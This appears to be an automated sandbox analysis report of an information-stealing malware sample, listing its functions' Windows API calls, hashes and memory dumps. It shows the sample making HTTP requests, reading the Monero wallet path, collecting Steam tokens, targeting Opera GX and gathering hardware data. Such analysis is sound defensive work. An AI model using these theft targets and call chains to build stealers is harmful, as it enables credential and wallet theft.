                                                                                • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                • String ID: #$Opera GX
                                                                                • API String ID: 2625060131-1046280356
                                                                                • Opcode ID: 8438e43411761002320f3f9de9011d9594c7e5a89b65446c504462b94cd75c98
                                                                                • Instruction ID: 7bf8bd95af0ab130806eb85ed7196d5d1824f91eddb0a7e88fed5b384ee0e496
                                                                                • Opcode Fuzzy Hash: 8438e43411761002320f3f9de9011d9594c7e5a89b65446c504462b94cd75c98
                                                                                • Instruction Fuzzy Hash: 47027C7190424CEADF14EBE5D956BDEBBB8AF19308F10417EE405732C2DA781B0C8B66
                                                                                Function 00413326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041332B
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrlen
                                                                                • String ID: ERROR
                                                                                • API String ID: 2133942097-2861137601
                                                                                • Opcode ID: e21d3304088cc9bcdfe72a3d82c06255ec2a2465ab3062463e78c3a24b0dedec
                                                                                • Instruction ID: 1c592bd34475586d8bf3bdcea4321633edf8985e3e402502d8e97464bbd79d58
                                                                                • Opcode Fuzzy Hash: e21d3304088cc9bcdfe72a3d82c06255ec2a2465ab3062463e78c3a24b0dedec
                                                                                • Instruction Fuzzy Hash: 8C3152B1D00148AFDB00EFA9D956BDD7FB4AB15304F10807EF505A7292DB399648CBA5
                                                                                Function 0041303A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041303F
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                  • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                  • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                  • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                  • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                  • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                  • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                  • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                • String ID: ERROR$ERROR
                                                                                • API String ID: 1120091252-2579291623
                                                                                • Opcode ID: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
                                                                                • Instruction ID: 0083d2e72e9c4a3b74dda565e39e4a0bb24369a5d23a76fc935ba894ca840aa9
                                                                                • Opcode Fuzzy Hash: 345aea7090713525bc43328569ab8dfd80e6ef4a38db32126cd76269f1d4eab7
                                                                                • Instruction Fuzzy Hash: 17210EB0900189EADB14FFA5C556BDDBBF4AF18308F50417EE80563682DB785B0CCB66
                                                                                Function 00411001 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                • String ID: 2IA
                                                                                • API String ID: 3183270410-4174278054
                                                                                • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                Function 00414437 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2678630583-0
                                                                                • Opcode ID: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                • Instruction ID: ec526774ace028d9da9643eeb35cca1a79bf063c44aba5694452f09cb0374c28
                                                                                • Opcode Fuzzy Hash: 1cb46bc23d17f687b51e131ae5113430bc73b21f4a29ab7455bec2179b617caf
                                                                                • Instruction Fuzzy Hash: 23310D75900148AFCB11DFA4C995ADEBBB8FF18304F50412EF906A7281DB789A88CB95
                                                                                Function 00401000 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3676486918-0
                                                                                • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                Function 0040FE18 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4), ref: 0040FE2C
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004266D4,00000000,?), ref: 0040FE33
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3676486918-0
                                                                                • Opcode ID: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                • Instruction ID: c6a06fe1a5752460b6d2ee94bc9516a9de2a98ba0b24791e6944b9a77995073e
                                                                                • Opcode Fuzzy Hash: 5a348dce4926add7b50cf3e1a3237f7deaf910ff3e5a2bc42b85e6f6daaeb5b6
                                                                                • Instruction Fuzzy Hash: 11F05E7A240214FFFB209BD1DD0EFAA7A7EEB45B04F101035FB01A61A1D7B05900DB64
                                                                                Function 00402308 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6%@$6%@
                                                                                • API String ID: 0-3369382886
                                                                                • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                Function 00414538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041453D
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004265B3), ref: 0041458E
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                • String ID: Soft\Steam\steam_tokens.txt
                                                                                • API String ID: 40794102-3507145866
                                                                                • Opcode ID: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                • Instruction ID: 67ec4c1d792d67a99180fbd14363f38a75f30ae372fc1f04672944380735093a
                                                                                • Opcode Fuzzy Hash: 7a5fed3ba98e7f09c9eff5b3c220e42c9313fc81122d0b4050e547e22e5d9ad4
                                                                                • Instruction Fuzzy Hash: D8214971C00188AACB14FBE5C956BDDBB78AF18308F50817EE401725D2DB78274CCA66
                                                                                Function 004165D9 Relevance: 4.6, APIs: 3, Instructions: 120stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004165DE
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                  • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                  • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                  • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                  • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                • String ID:
                                                                                • API String ID: 25485560-0
                                                                                • Opcode ID: 7b2ca0ca87c53fab111104ad7f9c0e0035106a6dff0b3672f02f9ca4e90a9d0e
                                                                                • Instruction ID: a017e0cda9a087e3faea27a0b0bd6cecf8e4da27d40e214f5f1144f69bbc44a5
                                                                                • Opcode Fuzzy Hash: 7b2ca0ca87c53fab111104ad7f9c0e0035106a6dff0b3672f02f9ca4e90a9d0e
                                                                                • Instruction Fuzzy Hash: 7C41BE71D4022DABCF10ABB0DC13DED3B79AB0C304F00466AF844A2192E77997958B96
                                                                                Function 6C7B3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C7B3095
                                                                                  • Part of subcall function 6C7B35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C83F688,00001000), ref: 6C7B35D5
                                                                                  • Part of subcall function 6C7B35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7B35E0
                                                                                  • Part of subcall function 6C7B35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7B35FD
                                                                                  • Part of subcall function 6C7B35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7B363F
                                                                                  • Part of subcall function 6C7B35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7B369F
                                                                                  • Part of subcall function 6C7B35A0: __aulldiv.LIBCMT ref: 6C7B36E4
                                                                                • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7B309F
                                                                                  • Part of subcall function 6C7D5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7D56EE,?,00000001), ref: 6C7D5B85
                                                                                  • Part of subcall function 6C7D5B50: EnterCriticalSection.KERNEL32(6C83F688,?,?,?,6C7D56EE,?,00000001), ref: 6C7D5B90
                                                                                  • Part of subcall function 6C7D5B50: LeaveCriticalSection.KERNEL32(6C83F688,?,?,?,6C7D56EE,?,00000001), ref: 6C7D5BD8
                                                                                  • Part of subcall function 6C7D5B50: GetTickCount64.KERNEL32 ref: 6C7D5BE4
                                                                                • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7B30BE
                                                                                  • Part of subcall function 6C7B30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C7B3127
                                                                                  • Part of subcall function 6C7B30F0: __aulldiv.LIBCMT ref: 6C7B3140
                                                                                  • Part of subcall function 6C7EAB2A: __onexit.LIBCMT ref: 6C7EAB30
                                                                                Memory Dump Source
